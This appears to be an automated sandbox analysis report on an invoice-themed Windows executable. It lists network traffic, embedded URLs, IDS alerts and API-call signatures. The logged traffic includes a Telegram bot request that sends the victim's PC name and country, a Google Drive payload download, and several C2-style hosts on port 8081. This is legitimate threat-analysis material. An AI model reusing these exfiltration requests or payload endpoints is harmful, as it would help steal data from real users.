Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2019/10/2024%20/%2007:08:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49982 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49967 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49981 -> 188.114.96.3:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49980 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM&export=download HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2019/10/2024%20/%2007:08:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Wuerth_factura_4052073226..exe, 00000000.00000002.2533263661.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Wuerth_factura_4052073226..exe, 00000000.00000000.2028021606.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000000.2528750158.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375C1000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375B2000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/=y
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277308268.0000000008870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM$LI
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZMlB
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EE6000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/&
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/:
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EE6000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM&export=download
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EE6000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/~
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.000000003744D000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374BD000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.000000003744D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374BD000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375F2000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49996 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

0_2_004052CB

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040327D
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_004032B2 lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004032B2

Detected potential crypto function

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_00404B08	0_2_00404B08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_00404B08	4_2_00404B08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DC147	4_2_000DC147
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DD278	4_2_000DD278
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D5362	4_2_000D5362
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DC472	4_2_000DC472
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DC738	4_2_000DC738
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DE988	4_2_000DE988
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DCA08	4_2_000DCA08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DCCD8	4_2_000DCCD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D9DE0	4_2_000D9DE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DCFAA	4_2_000DCFAA
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D6FC8	4_2_000D6FC8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DE97A	4_2_000DE97A
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DF974	4_2_000DF974
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D29E0	4_2_000D29E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D3E09	4_2_000D3E09
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB2968	4_2_39DB2968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBFC68	4_2_39DBFC68
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB5028	4_2_39DB5028
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB17A0	4_2_39DB17A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB9328	4_2_39DB9328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB1E80	4_2_39DB1E80
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBDDF1	4_2_39DBDDF1
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD999	4_2_39DBD999
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD9A8	4_2_39DBD9A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD550	4_2_39DBD550
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB9548	4_2_39DB9548
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD540	4_2_39DBD540
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD0F8	4_2_39DBD0F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD0E9	4_2_39DBD0E9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBCC8F	4_2_39DBCC8F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBCCA0	4_2_39DBCCA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB0040	4_2_39DB0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB9C18	4_2_39DB9C18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB5018	4_2_39DB5018
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB0012	4_2_39DB0012
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBF810	4_2_39DBF810
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBF805	4_2_39DBF805
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB8B91	4_2_39DB8B91
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB178F	4_2_39DB178F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBF3B8	4_2_39DBF3B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBF3A8	4_2_39DBF3A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB8BA0	4_2_39DB8BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBEF51	4_2_39DBEF51
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBEF60	4_2_39DBEF60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBEB08	4_2_39DBEB08
